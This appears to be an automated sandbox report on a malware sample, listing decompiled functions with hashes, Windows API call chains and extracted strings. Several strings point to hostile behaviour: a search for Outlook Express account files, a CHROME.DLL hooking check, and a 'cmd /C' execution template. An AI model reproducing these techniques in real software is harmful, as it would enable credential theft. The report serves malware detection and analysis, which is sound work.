  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
